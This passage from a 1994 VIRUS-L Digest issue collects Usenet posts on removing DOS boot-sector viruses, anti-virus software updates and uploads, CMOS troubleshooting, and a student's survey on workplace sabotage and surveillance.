Help is needed; anyone interested in making a disinfector (or adding a string to one already done) please contact me.

Chris
rauh@ime.usp.br

------------------------------

Date: Wed, 26 Oct 94 14:38:45 -0400
From: agecon@hubcap.clemson.edu (Dexter Hawkins)
Subject: Anti-CMOS infection - HELP! HELP! (PC)

I have found the AntiCMOS virus on a machine in the department.
After consulting news group I tried FDISK /MBR and SYS C:, but this fix did not work. The virus turns up when you scan machine with F-PROT and with the new scan V2.1.1. The machine has a compressed hard drive using MS-DOS 6.2. I can use any help available.

Dexter (dexter@keowee.agecon.clemson.edu)

------------------------------

Date: Wed, 26 Oct 94 16:23:55 -0400
From: tsaiwn@csie.nctu.edu.tw (Wen-Nung Tsai)
Subject: Where is the new version of FSHIELD? (PC)

Hello there,

In the past years, I always used FSHIELD to protect important files. I found the files shielded by FSHIELD cannot RUN under DOS 6.22. Could somebody out there tell me where to get a new FSHIELD?

Thanks in advance.

- --
- --------------------------------------------
Wen-Nung Tsai
INTERNET: tsaiwn@csunix.csie.nctu.edu.tw
Dep. of CSIE
National Chiao Tung University
HsinChu, Taiwan, R.O.C.

------------------------------

Date: Wed, 26 Oct 94 19:47:23 -0400
From: nguyent6@watserv.ucr.edu (Thi V Nguyen)
Subject: Re: ubuythis.now (PC)

Tony Brower (tony.brower@factory.com) wrote:
: Something (presumably a virus?) is causing an empty file called
: "ubuythis.now" to be created in my root directory on my hard drive. If
: it is erased it just reappears soon.
: Virusscan doesn't find anything and no damage seems to have been done,
: but it's disconcerting all the same.
: Anyone have any clues?
: Tony Brower
: tony.brower@factory.com

I don't think a virus put that file there. From what I've read that file was put there by Telix for Windows ver 1. There is an update that is supposed to get rid of that file. The file is basically there to force the user to either register or delete the program.

- --
Thi Nguyen
nguyent6@watmail.ucr.edu

------------------------------

Date: Wed, 26 Oct 94 21:06:46 -0400
From: johnnyrock@delphi.com
Subject: Re: Can a master boot record be repaired?
(PC)

Mike McCarty writes:
>I suppose an ANSI bomb could run debug and actually type in the whole
>virus creating a program in memory or on disc and then run it for you.

I've seen this done. PKZIP has an option for creating an ANSI file that will be displayed when the file is dezipped. It is often used for file lists and titles but can execute an ANSI bomb. When the unsuspecting file is unzipped the code is loaded either directly or into the function keys.

------------------------------

Date: Wed, 26 Oct 94 22:15:06 -0400
From: gedaliah@panix.com (Gedaliah Friedenberg)
Subject: Microsoft Anti-Virus updates (PC)

I have Microsoft Anti-Virus which is dated copyright 1993. Is it possible to get an update from Microsoft to include new viruses since then?

Thanks
Gedaliah

- --
Gedaliah Friedenberg -=- Graduate Student- City University of New York -=-
-=- Ohr Somayach Yeshiva - Monsey, New York -=-

------------------------------

Date: Wed, 26 Oct 94 23:31:26 -0400
From: Zeppelin@ix.netcom.com (Mr. G)
Subject: re:JUNKIE VIRUS (PC)

slota@rtsg.mot.com (Dave Slota) writes:
>I have removed the Junkie virus with NAV 3.0 and the latest patch.
>Both Mcafee 117 & scan 2.1.0 found it but could not clean it. It did
>do a lot of damage to my windows files.

Was the GDI.EXE zeroed out ?

-Zep-

------------------------------

Date: Wed, 26 Oct 94 23:49:13 -0400
From: Zeppelin@ix.netcom.com (Mr. G)
Subject: Re: Central Point Update? ---- FTP site? (PC)

jones@cbdb1.nimh.nih.gov (Doug Jones) writes:
>groener wrote:
>>Does anyone know if Symantec has an FTP site so that I can get
>>updates on the Virus signatures?
>
>Yes, it's ftp.symantec.com. But I have only seen NAV stuff there,
>nothing so far for CPAV.

Try OAK.
oakland.edu SimTel/msdos/virus

------------------------------

Date: Wed, 26 Oct 94 23:52:37 -0400
From: Zeppelin@ix.netcom.com (Mr.
G)
Subject: Re: invb601.zip - The InVircible Anti-Virus Expert System v6.01 (PC)

frankj@tv.tv.TEK.COM (Frank Jazowick) writes:
> I just read about invb601.zip - The InVircible Anti-Virus Expert System
>v6.01, and how good it is........
>
> Now up to this point, I know that F-Prot was just about equal or one of
>the best anti-virus shareware programs around..... So does anyone know about
>this invb601.zip program and how good/reliable it is and so on??
>
> I just downloaded it and am waiting for feedback from you readers to
>comment on this..

I am a TBAV junkie, but I have now installed IV as a backup program. I run it at startup and use it to take the place of the TBAV Boot secure program. I cannot recommend it yet, but I can say that I use it.

-Zep-

------------------------------

Date: Thu, 27 Oct 94 00:38:57 -0400
From: enniaun@delphi.com
Subject: Re: Need Help with Stoned Virus (PC)

Gordon C Roth writes:
>You will have to boot from a write protected floppy disk with the
>appropriate anti virus software (McAfee-clean etc). The stoned virus

You hit that one on the head. He should use the McAfee (or similar) 'CLEAN' program. Stoned is very easy to remove with it. Be sure to 'clean' EVERY bootable floppy you've got.

- -Enniaun
enniaun@delphi.com
71327,3333@compuserve.com

------------------------------

Date: Thu, 27 Oct 94 01:05:38 -0400
From: enniaun@delphi.com
Subject: Re: Can a virus change CMOS settings??? (PC)

Jan David Mol writes:
>Another explanation for your problems with your CMOS is that the battery,
>which makes sure that the clock in your PC keeps running even if you turn
>your computer off, and which prevents your CMOS from being cleared, can be (
>almost) empty. If so, you'll have to replace it since they cannot be reloaded.

Check to see if the clock is behaving correctly. When the battery starts to go, the clock starts to act up. Often it will stop cold when the system is off and start up when you power back up. Depends on the actual battery level.
Yes, a program/virus can reset the time, but can't affect anything when the system is turned off. (sorry -typos, really bad editor on this system)

Also, there are levels of CMOS that you usually can't change in the CMOS menu. Some BIOSs let you reset these by holding down the INSERT key when you power up. Just another angle to check.

- -Enniaun

------------------------------

Date: Thu, 27 Oct 94 06:58:57 -0400
From: Olivier.Montanuy@ens.fr (Olivier Montanuy)
Subject: Mc Afee validate: still used though USELESS! (PC)

I find it very funny that 5 months after I demonstrated to them that VALIDATE.EXE and VALIDATE.COM were completely useless as integrity checkers, McAfee associates *still* use this product in their packages. Well, now I know Vesselin Bontchev was right about them :-)

BTW, my proggy to spoil validated files without changing the result was sent to M. Bontchev on his request. Ask him if it works :-) Not that it was really a feat at all... Real authentication uses PGP.

- --
# Olivier Montanuy (montanuy@dmi.ens.fr) #
# Author of DeuTex/DeuSF utilities for DOOM/DOOM2 #
# check infant2.sphs.indiana.edu /pub/doom/incoming #
# and also ftp.cdrom.com,iglou.com,ftp.luth.se #

------------------------------

Date: Thu, 27 Oct 94 08:01:43 -0400
From: agecon@hubcap.clemson.edu (Dexter Hawkins)
Subject: HELP! ANTICMOS virus (PC)

I have tried the fixes mentioned in newsgroup for virus with no results. I have used FDISK /MBR and SYS C:, but still have the virus. The machine has been doublespaced using MS-DOS 6.2. Please help, I am desperate as the machine has info that the owner did not backup and it cannot be accessed.

Dexter Hawkins (dexter@keowee.agecon.clemson.edu)

------------------------------

Date: Tue, 11 Oct 94 17:17:00 +0200
From: Amir_Netiv@f120.n9721.z9.virnet.bad.se (Amir Netiv)
Subject: Viruses & TSRs (PC)

datadec@corsa.ucr.edu (Kevin Marcus) writes:
> 2. How easy is it for a virus to defeat an antivirus product loaded
> as a tsr?
(dos)

Richard Ford answers:
> I mean, who *doesn't* know how to unhook the
> MSAV TSR. Even if you armour your code, the virus
> writer gets as long as he likes to break it.
> The other thing to remember with TSR virus protection
> is that many of the virus-specific ones do not have a
> very good detection ratio (see Virus Bulletin test in
> September 1993 edition)... especially on the extreme polymorphics.
> Indeed, it would seem that much of the effort is
> concentrated on what is in the wild. I would be
> interested to know how many TSR scanners get Pathogen or Queeg.
> The problem here is one of overhead (both memory and performance).
> Just make your code polymorphic enough, and you will
> defeat the TSR.

Is this a reason to remove all TSR Anti-Viruses from the memory? Please remember (See Virus Bulletin of some time, and all lots of other magazines) that MOST infections in the world ARE made by several FEW viruses only. So you don't really need to look for the ultimate TSR, just a reasonable minimum overhead one will be enough. It will protect you from the very most common viruses, and as there is really NO other alternative (except get infected first and only then try to clean it)... can you recommend a better idea?

Regards,
* Amir Netiv. V-CARE Anti-Virus, head team *

- ---
* Origin: <<< NSE Software >>> Israel (9:9721/120)

------------------------------

Date: Thu, 27 Oct 94 00:15:26 -0400
From: bondt@dutiws.TWI.TUDelft.NL (Piet de Bondt)
Subject: tbav - Thunderbyte anti-virus v6.26 (Complete/Windows/Optimized) (PC)

I have uploaded to SimTel, the Coast to Coast Software Repository (tm), (available by anonymous ftp from the primary mirror site OAK.Oakland.Edu and its mirrors):

SimTel/msdos/virus/
tbav626.zip     Thunderbyte anti-virus pgm (complete) v6.26
tbavw626.zip    Thunderbyte anti-virus pgm (Windows) v6.26
tbavx626.zip    TBAV anti-virus - processor optimized versions

The Thunderbyte Anti-Virus utilities are ShareWare.
There are four security modules (TbScan, TbScanX, TbClean, TbMon) included. These modules are programmed in assembler and therefore very fast! TbScan is a signature, heuristic and CRC scanner. It detects known, unknown and future viruses. TbScanX is the resident version of TbScan. TbClean is the first heuristic cleaner in the world. Even an infected file with an unknown virus can be cleaned. TbMon consists of three resident programs (TbMem, TbFile, TbDisk) which monitor your system against unknown viruses.

From version 6.22 a complete Windows version is available. Note that for Windows you need both the Windows and the DOS files !

Replaces: SimTel/msdos/virus/
tbav625.zip and older
tbavx625.zip and older
tbavw624.zip and older

TBAV is uploaded by its authors to anon-ftp site ftp.twi.tudelft.nl (in dir /pub/msdos/virus/tbav) and from there distributed to SimTel (via oak.oakland.edu), garbo.uwasa.fi, nic.funet.fi and ftp.sunet.se, and from there to their mirror-sites.

Greetings,

Piet de Bondt bondt@dutiws.twi.tudelft.nl
==============================================================================
FTP-Admin for MSDOS Anti-virus software at anon-ftp-site: ftp.twi.tudelft.nl

------------------------------

Date: Thu, 27 Oct 94 00:15:29 -0400
From: 72571.3352@CompuServe.COM (Wolfgang Stiller)
Subject: i_m231b.zip - IntegrityMaster 2.31b antivirus/data integrity (PC)

I have uploaded to SimTel, the Coast to Coast Software Repository (tm), (available by anonymous ftp from the primary mirror site OAK.Oakland.Edu and its mirrors):

SimTel/msdos/virus/
i_m231b.zip     IntegrityMaster 2.31b antivirus/data integrity

Integrity Master provides complete, easy to use, data integrity for your PC plus virus protection. It can also be used to provide file change management and security on your PC. As well as scanning for known viruses, it detects unknown viruses and unlike other products will detect files which have been damaged but not infected by a virus.
IM checks and restores your CMOS including the new larger CMOS configuration memories found on most newer PCs. INTEGRITY MASTER PROTECTS YOU AGAINST ALL THREATS TO YOUR DATA AND PROGRAMS NOT JUST VIRUSES!

Special requirements: None

Changes: Virus scanner recognizes additional viruses and fixes false positive. Redesigned screen display. Home directory now supported for report and sector related files.

i_m231b.zip has replaced i_m231.zip.

ASP ShareWare. Uploaded by the author.

Wolfgang Stiller
Stiller Research
2625 Ridgeway St.
Tallahassee, FL 32310 USA
72571.3352@CompuServe.COM
wolfgang@freenet.tlh.fl.us

------------------------------

Date: Mon, 24 Oct 94 22:57:09 -0400
From: jmittell@students.wisc.edu (jajasoon tlitteu)
Subject: Sabotage, Pranks & Surveillance Survey

SURVEY ON SURVEILLANCE, SABOTAGE & PRANKS IN THE WORKPLACE

I am doing research on the practices of individuals in workplaces in association with high-technology. Specifically I am looking for stories of people who have used high-technology in acts of personal resistance through pranks and/or sabotage. How these terms are defined is up to you - - do you think your action was a prank or sabotage? I am also looking for how high-technology is used as surveillance over workers in your workplace. If you have any stories that meet this description, please fill out the below questionnaire and return it via email to:

jmittell@students.wisc.edu

All stories will be used completely anonymously and I will not use the names of any people or companies in my paper. If you have any questions, concerns or suggestions for my research, do not hesitate to contact me at the above address. Do not post any responses or commentary to this newsgroup (note that this is cross-posted to many groups). Thank you in advance for your time and stories.

******************************************

1. Please describe the job where your action(s) took place.
Note whether you are still working at this job and how long you had been working there at the time.

2. Please describe the physical situation where your action(s) took place.

3. Is/was this job subject to any forms of high-technological surveillance? If so, please describe.

4. Please describe your high-technological prank or act of sabotage.

5. What were the short-term effects of this action? Possibly include how it was received by co-workers, supervisors or peers, how it made you feel about your job, any immediate shifts of power or respect in your workplace, and any other immediate effects.

6. What were the long-term effects of this action? Possibly include disciplinary responses to you or others, changes in the company's performance or functioning, changes in your job or others, and any other long-term effects.

7. Was this action related to or affected by surveillance issues? If so, please explain how.

8. How long ago was this action? How do you feel about it now? Was it worth any negative effects it had on you?

9. If I have any further questions about your actions or your working conditions, would you be willing to answer future questions via email?

10. Please include any miscellaneous comments or issues that you feel your above answers do not address adequately.

By sending this email, you are giving me permission to use your answers anonymously in my research and in the paper that will develop from this research. If you have any concerns about this, please email me. Thank you again for your participation.

------------------------------

End of VIRUS-L Digest [Volume 7 Issue 90]
*****************************************